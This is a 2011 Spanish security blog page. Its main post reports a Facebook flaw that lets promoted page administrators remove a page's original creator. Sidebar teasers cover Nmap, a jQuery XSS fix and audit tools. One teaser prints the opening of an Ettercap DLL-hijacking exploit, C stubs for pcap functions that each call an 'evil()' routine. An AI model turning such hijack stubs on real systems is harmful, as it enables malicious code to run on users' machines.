¡La Informática al límite!
Fallo en facebook que permite apropiación de páginas creadas
El portal Naked Security ha detectado un fallo en el sistema de administración de las páginas de facebook, que podría comprometer la autoridad de los creadores originales.
Según el portal especializado en seguridad de Sophos, se ha demostrado un fallo en el sistema que permitiría a los usuarios elevados a administradores eliminar a los creadores originales de las páginas, contrariamente a lo que Facebook afirma en sus condiciones del servicio.
De esta forma, si el responsable de una página de Facebook decide ascender a un contacto para que sea administrador, podría ver como su contacto elimina sus privilegios.
El portal Naked Security asegura que esta práctica es posible y contradice las normas del servicio de Facebook. Citando una respuesta de Facebook FAQ, el portal asegura que en las condiciones de Facebook figura la cláusula: “El creador original de una página no podrá ser eliminado por otros administradores”.
Para demostrar el fallo del sistema, en Naked Security han publicado un vídeo en el que se puede ver todo el proceso y se comprueba el fallo descrito.
| Este artículo fue publicado por WindHack el 8 septiembre, 2011 a las 1:46 PM, y está archivado en Inseguridad Informática, Noticias. Sigue las respuestas a esta entrada a través de RSS 2.0. Puedes dejar un comentario o enviar un trackback desde tu propio sitio. |
Aún no hay comentarios.
Aún no hay trackbacks.
Ettercap NG-0.7.3 DLL Exploit
hace 1 mes - No hay comentarios
———————————————————————- Exploit Title: Ettercap NG-0.7.3 DLL hijacking (wpcap.dll) Autor: $ slashdot Testeado: Windows XP SP3 Extensión Vulnerable: .pcap ———————————————————————- #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void pcap_findalldevs() { evil(); } DLLIMPORT void pcap_close() { evil(); } DLLIMPORT void pcap_compile() { evil(); } DLLIMPORT void pcap_datalink() { evil(); } DLLIMPORT void pcap_datalink_val_to_description()…
Modificación al plugin MyBBPublisher
hace 3 meses - No hay comentarios
Debido a diversas razones y a la sencillez con la que realiza las publicaciones el plugin para difundir los nuevos temas en sitios sociales (Facebook y Twitter), me vi en la obligación de realizar una modificación a MyBBPublisher, la cual está enfocada sólo en Facebook. Basándome en la referencia (API de facebook) y su método ‘post‘, encontré los…
¡Lanzado el Nmap 5.51!
hace 5 meses - No hay comentarios
Hace poco salió la ultima versión de Nmap, una de las herramientas que cualquier persona interesada por la seguridad informática debe conocer y utilizar. Algunas de las mejoras en la versión 5.51 Soporte para el protocolo Gopher Añadidos 177 NSE scripts 2,982 OS fingerprints añadidos 7,319 firmas de versiones agregadas Inclusión de la nueva herramienta NCAT y…
IntyPedia: Enciclopedia visual de la seguridad de la información
hace 5 meses - No hay comentarios
Intypedia es una enciclopedia visual de la seguridad de la información. El proyecto persigue difundir conocimientos sobre esta temática mediante lecciones en vídeo desarrolladas por destacados expertos usando un lenguaje accesible por un amplio público. La enciclopedia abarca temas como la criptografía, la seguridad en redes, el malware, la seguridad web, entre otros. Las lecciones publicadas…
Cross Site Scripting en jQuery 1.6
hace 8 meses - No hay comentarios
Se ha arreglado una vulnerabilidad que permitía realizar ataques Cross Site Scripting (XSS) en jQuery 1.6. La vulnerabilidad podía ser explotada en ciertos sitios que utilizaran la variable ‘location.hash’ en un contexto que no fuera el de Cascading Style Sheets (CSS). jQuery es una biblioteca o framework javascript de software libre y código abierto. Es compatible con la mayoría…
Presentaciones de la Defcon19 (2011)
hace 9 meses - No hay comentarios
Fueron publicadas las presentaciones de la DefCon19. Están en inglés, obviamente, y algunas son bastante complejas si no estás en la explicación, pero de igual forma, encontrarás varias entretenidas. ¡Échale un vistazo! File or Directory Name Size (Units) dc-19-program.pdf (19.01 MiB) DEFCON-19-Abstrct-The-Schemaverse-Guide.pdf (592.27 KiB) DEFCON-19-Abstrct-The-Schemaverse.pdf (993.54 KiB) DEFCON-19-Almeida-Workshop-ESD.pdf (1.85 MiB) DEFCON-19-Alonso-Garrido-DUST.pdf (1.78 MiB) DEFCON-19-Alonso-Garrido-Excel.pdf…
KromCAT: Convierte Chrome en una herramienta de auditorías
hace 10 meses - No hay comentarios
Hace algún tiempo os presenté Mantra. Un navegador basado en Mozilla Firefox y que se combinaba con el proyecto FireCAT para convertirlo en una potente herramienta para realizar auditorías de seguridad, pero como es mejor tener una lista de dónde elegir, hoy os vengo a presentar el proyecto KromCAT. KromCAT es un conjunto…
Google lanza una herramienta para detectar vulnerabilidades en aplicaciones web
hace 10 meses - No hay comentarios
Google ha lanzado una nueva herramienta denominada DOM Snitch destinada a desarrolladores que permite verificar si las aplicaciones web que han creado son vulnerables a ataques y ponen en peligro la seguridad de los usuarios de Chrome. La herramienta que lanza Google es una extensión de Chrome en fase experimental permite a los desarrolladores y…
Mantra: navegador para auditorías de seguridad
hace 11 meses - No hay comentarios
Mantra es un navegador cuyo objetivo es ser una herramienta primordial para las auditorías de seguridad. Está basado en Mozilla Firefox, y es una compilación personalizada, de versión portable, fácil uso y totalmente configurable. Se encuentra disponible para los sistemas operativos GNU/Linux, Windows y MacOS. En su versión actual, han decidido unir su proyecto con…
DaW – Labs ahora en Facebook!
hace 1 año - 4 comentarios
Hemos decidido crear nuestra página en facebook. Te invitamos a que te hagas fan, compartas tus opiniones sobre el sitio y nos dejes algunas sugerencias para hacer de DaW – Labs un lugar mejor!. Atte. WindHack.
